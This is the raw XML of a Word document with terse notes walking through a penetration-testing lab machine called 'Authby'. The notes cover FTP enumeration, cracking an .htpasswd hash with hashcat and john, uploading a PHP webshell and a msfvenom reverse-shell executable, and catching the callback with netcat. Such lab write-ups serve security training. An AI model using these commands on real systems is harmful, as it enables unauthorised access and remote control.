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01D42844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CC344F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Authby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556FF3B8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CC344F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -sC -sV -Pn -p- t_ip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159611C0" w:rsidR="00843DCE" w:rsidRDefault="00027CA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notice anonymous FTP so try it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F72D72" w14:textId="20B7CB96" w:rsidR="00843DCE" w:rsidRDefault="00027CA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ftp t_ip = anonymous = we notice the same </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070E20AD" w14:textId="01EF69C5" w:rsidR="00027CAE" w:rsidRDefault="00027CA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now we notice the 3145 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>port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so try with it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB5CA4D" w14:textId="1CF25751" w:rsidR="00027CAE" w:rsidRDefault="00027CA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ftp t_ip 3415 = admin = but login failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000ECC7C" w14:textId="44996F2D" w:rsidR="00027CAE" w:rsidRDefault="00027CA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search zftp exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C199A09" w14:textId="34F44510" w:rsidR="00027CAE" w:rsidRDefault="00027CA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notice </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>anonymous:anonymous</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@ so here we try with admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EDC68B" w14:textId="5EE7199D" w:rsidR="00027CAE" w:rsidRDefault="00027CA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ftp t_ip = admin = if need enter or admin@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44703347" w14:textId="77777777" w:rsidR="00027CAE" w:rsidRDefault="00027CA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0C1E9042" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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are in = mget * = to download all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B90E5CF" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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htpasswd are obtain password of offsec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CCE1A8" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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search hash </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>identify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= paste it we notice mds5 hashid so again search and we pypi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF9D15B" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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hashcat -m </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1600 .htpassword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rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E17C68" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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if not run perfectly run with john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556E6E48" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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john .htpasswd - -wordlist=rockyou.txt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030750C0" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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we obtain elite = if not then use /seclists/passwords/xató-net-10-million-passwords-100000.txt .htpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB191EB" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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visit the website and we obtain the same as we see into the index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1937B8BF" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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php-reverse-shell for windows search it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B72FBD" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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dhayalab use it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AF098D" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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vi shell.php = paste and change our details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0E4048" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C51719" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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msfvenom -p windows/shell_reverse_tcp lhost=our_ip lport=1234 -f exe &gt; reverse.exe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34E98762" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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nc -lvnp 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFB8E4B" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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ftp t_ip = admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368ECF54" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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put reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB49B90" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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put shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC0B92E" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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exit now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728CF9B1" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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go to the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2553EF5E" w14:textId="77777777" w:rsidR="00C54BFF" w:rsidRDefault="00C54BFF" w:rsidP="00C54BF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t_ip/shell.php and its done</w:t>
      </w:r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0C0D8C61" w14:textId="5E3952FD" w:rsidR="00A311DF" w:rsidRPr="00843DCE" w:rsidRDefault="008441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 we got the proof.txt</w:t>
      </w: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27CAE"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="00171D98"/>
    <w:rsid w:val="00385C65"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="004E5B12"/>
    <w:rsid w:val="005C29CB"/>
    <w:rsid w:val="005F26D2"/>
    <w:rsid w:val="00661000"/>
    <w:rsid w:val="00671A79"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00844173"/>
    <w:rsid w:val="008F7741"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00AE44CD"/>
    <w:rsid w:val="00C54BFF"/>
    <w:rsid w:val="00CC344F"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00CF166F"/>
    <w:rsid w:val="00D93FAE"/>
    <w:rsid w:val="00E47C8A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13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-10T17:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>